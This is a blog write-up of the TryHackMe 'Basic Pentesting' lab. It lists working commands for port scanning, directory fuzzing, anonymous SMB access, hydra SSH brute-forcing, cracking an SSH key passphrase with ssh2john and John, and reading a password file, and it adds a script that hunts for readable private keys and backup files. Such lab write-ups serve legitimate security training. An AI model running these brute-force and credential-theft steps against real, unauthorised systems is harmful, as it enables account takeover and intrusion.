Monday, January 30, 2023

Tryhackme - Basic Pentesting - How I solved it

 BASIC PENTESTING - Tryhackme


#Finding open ports with an nmap scan 

Connect to the box over the VPN and use nmap to find the open ports. The flag is -sV with a capital V (lowercase -sv is not a valid scan type); it also probes each open port for the service and version behind it, which is how we learn that SSH, HTTP and SMB are running:

nmap -sV ip_address

The output lists every open port on the target together with the detected service.


#Finding hidden directories with the ffuf tool
To find hidden directories we can use ffuf. The word FUZZ in the URL marks where each wordlist entry is substituted; without it ffuf has nothing to fuzz.

ffuf -u http://ip_address/FUZZ -w /usr/share/wordlists/dirb/common.txt 

This lists the paths under the URL that respond, i.e. the hidden directories.

gobuster and similar tools do the same job.


#Finding users with some enumeration

We can look through the website with the browser's inspector tools. ffuf found /development as a hidden directory, and visiting ip_address/development shows two text files: one says that a user has a very easy-to-crack password, and the other mentions that an SMB server is running on the box.
We can list the shares the SMB server offers with smbclient (-N skips the password prompt):
smbclient -N -L //ip_address

The output shows a share named anonymous that needs no credentials, so we can connect to it directly (this form avoids the shell escaping needed for the \\ip_address\anonymous spelling):
smbclient -N //ip_address/anonymous


Inside the share, ls lists a .txt file. Fetch it with get and read it locally; it contains a message mentioning two users, jan and kay (the account names on the box are lowercase, which matters for hydra and ssh).


#Cracking a user password with hydra

Now that we know the usernames, and the note said jan's password is the weak one, we can brute-force jan's SSH login with hydra. The graphical front-end xHydra does the same thing as the command-line tool: set the target IP, the protocol ssh, the single username jan and a password list such as rockyou.txt, then start the attack.


When the attack finishes, hydra reports that jan's password is armando


#Login with the password and privilege escalation 

With the password we can log in to the SSH server:
ssh jan@ip_address 


Once on the box we can look for privilege escalation paths by hand, or run linpeas, which enumerates the usual candidates much faster than a manual search. Copy linpeas.sh to the box with scp (note the user@ prefix and a destination jan can write to, such as /tmp):
scp /path/to/linpeas.sh jan@ip_address:/tmp/
Going through the results we find a private SSH key belonging to the user kay that jan can read. We can try to log in as kay with it, but the key is protected by a passphrase. Copy the key contents into a file on the attacking machine and restrict it to owner read/write, because ssh refuses to use a key that other users can read:
chmod 600 file_name

So we have to crack the passphrase, which we can do with John the Ripper. John cannot take the key file directly; the ssh2john.py script that ships with John converts the key into a hash John can attack. It can be located with the command: locate ssh2john.py . On Kali it lives in the /usr/share/john directory.
Using the command: 

python3 /usr/share/john/ssh2john.py private_ssh_key_file_name > hashed_file_name


With the hash written out, we can crack the passphrase with John and the rockyou wordlist:
john --wordlist=/usr/share/wordlists/rockyou.txt hashed_file_name 

Once the passphrase is cracked we can log in as kay with the key (ssh prompts for the passphrase):

ssh -i private_ssh_key_file_name kay@ip_address


After logging in as kay we can cat the pass.bak file in kay's home directory to extract the final password.
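The manual equivalent of the linpeas search described above, as an added example that is not code from the original post or from the room: it walks a directory tree for private keys and backup files the current user can read, reports whether a found key is passphrase-protected (a classic PEM key, the kind ssh2john.py converts, carries a Proc-Type: 4,ENCRYPTED header; a new-format OpenSSH key carries the cipher name inside its base64 body, where "none" means no passphrase), and stages a key with the 0600 mode ssh insists on. The sample tree, the key stubs (headers only, bodies elided), the file names and the password text are constructed for the demonstration and are not the room's values.

```shell
#!/bin/sh
# Added example (not from the original post or the room): manual stand-in
# for the linpeas search, limited to the kind of loot this box holds.
#   find_loot ROOT        - readable private keys and *.bak files under ROOT
#   key_is_encrypted KEY  - encrypted / unencrypted / unknown, from the headers
#   install_key SRC DST   - copy a key with the 0600 mode ssh insists on
# The sample tree, key stubs and password text below are constructed.

find_loot() {
    find "$1" -type f \( -name 'id_rsa' -o -name 'id_dsa' -o -name 'id_ecdsa' \
        -o -name 'id_ed25519' -o -name '*.pem' -o -name '*.bak' \) -print 2>/dev/null |
    while IFS= read -r f; do
        [ -r "$f" ] && printf '%s\n' "$f"
    done | sort
}

key_is_encrypted() {
    if head -n 1 "$1" | grep -q 'BEGIN OPENSSH PRIVATE KEY'; then
        # New format: the base64 body starts with "openssh-key-v1\0" followed by a
        # length-prefixed cipher name; "none" means the key has no passphrase.
        if sed '1d;$d' "$1" | base64 -d 2>/dev/null | head -c 64 |
           tr -cd 'a-z0-9-' | grep -q '^openssh-key-v1none'; then
            echo unencrypted
        else
            echo encrypted
        fi
    elif grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
        echo encrypted      # classic PEM with a passphrase: what ssh2john.py converts
    elif grep -q 'PRIVATE KEY-----' "$1"; then
        echo unencrypted    # classic PEM without the Proc-Type header
    else
        echo unknown        # not a key (for example the pass.bak file)
    fi
}

install_key() {
    cp "$1" "$2" && chmod 600 "$2" || return 1
    # ssh refuses a group- or world-readable key; confirm the exact mode
    [ -n "$(find "$2" -maxdepth 0 -perm 600)" ]
}

DEMO="$(mktemp -d)"
mkdir -p "$DEMO/home/kay/.ssh" "$DEMO/home/jan"

# Constructed stub of a passphrase-protected classic PEM key (body elided).
cat > "$DEMO/home/kay/.ssh/id_rsa" <<'EOF'
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF

AAAA
-----END RSA PRIVATE KEY-----
EOF

# Constructed stub of an unencrypted new-format key: only the leading bytes.
{
    echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1\000\000\000\000\004none\000\000\000\004none' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'
} > "$DEMO/home/jan/id_ed25519"

echo 'constructed-placeholder-password' > "$DEMO/home/kay/pass.bak"   # not the room's value
echo 'nothing to see here' > "$DEMO/home/jan/notes.txt"                # not matched by name

# Walk the tree, classify what was found, then stage kay's key for ssh -i.
find_loot "$DEMO" | while IFS= read -r f; do
    printf '%s: %s\n' "$f" "$(key_is_encrypted "$f")"
done
install_key "$DEMO/home/kay/.ssh/id_rsa" "$DEMO/kay_id_rsa" && echo "staged $DEMO/kay_id_rsa"
```

Run it with sh on the target (point find_loot at / instead of the demo tree) or on the attacking machine after copying files back. The demo tree is left under the mktemp directory so the staged key can be inspected; remove it by hand when done.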



Summary :

Finding open ports
Enumerating for usernames
Brute-forcing the discovered user's password
Logging in over SSH with the cracked password
Enumerating the box for privilege escalation
Cracking the passphrase of the second user's SSH key
Logging in as the second user and reading the final password





Tools used :
Nmap
ffuf or gobuster
Smbclient
Hydra
Linpeas
scp
JohnTheRipper (with ssh2john.py)
Thursday, September 2, 2021